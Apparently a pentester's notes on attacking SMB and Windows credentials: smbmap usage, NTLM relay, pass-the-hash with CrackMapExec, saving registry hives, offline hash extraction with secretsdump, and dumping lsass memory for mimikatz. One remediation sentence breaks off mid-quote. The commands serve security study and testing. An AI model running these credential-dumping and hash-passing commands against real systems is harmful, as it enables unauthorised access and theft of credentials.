Pentesting SMB

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb
https://github.com/ShawnDEvans/smbmap

Use -R for a recursive share listing; with -p you can pass the hash instead of the password, in LMHASH:NTHASH form (the empty LM hash aad3b435b51404eeaad3b435b51404ee followed by the NT hash is the usual case).

NTLM Relay

https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0

Remediation: disabling LLMNR. Open the Group Policy Editor in your version of Windows, navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client and, under DNS Client, make sure that "Turn OFF Multicast Name

Different ways to use Pass the Hash (PTH)

https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/

CrackMapExec (the -H value is the NT hash; cme also accepts the LM:NT pair):

cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79 -d domain.local
SMB         10.0.0.20     445    PC01      [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True)
SMB         10.0.0.20

Note the (signing:False) in the banner: SMB signing not being required is the condition that also makes the host a usable NTLM relay target.

Dumping credentials, NTLMv1 hashes, PtH, cracking NTLM hashes

https://pure.security/dumping-windows-credentials/

Registry hives (requires local administrator):

C:> reg.exe save hklm\sam c:\temp\sam.save
C:> reg.exe save hklm\security c:\temp\security.save
C:> reg.exe save hklm\system c:\temp\system.save

Password hashes (Impacket; LOCAL tells secretsdump to parse the saved hives offline instead of connecting to a host):

$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Credentials in memory (Procdump):

C:> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
C:> mimikatz.exe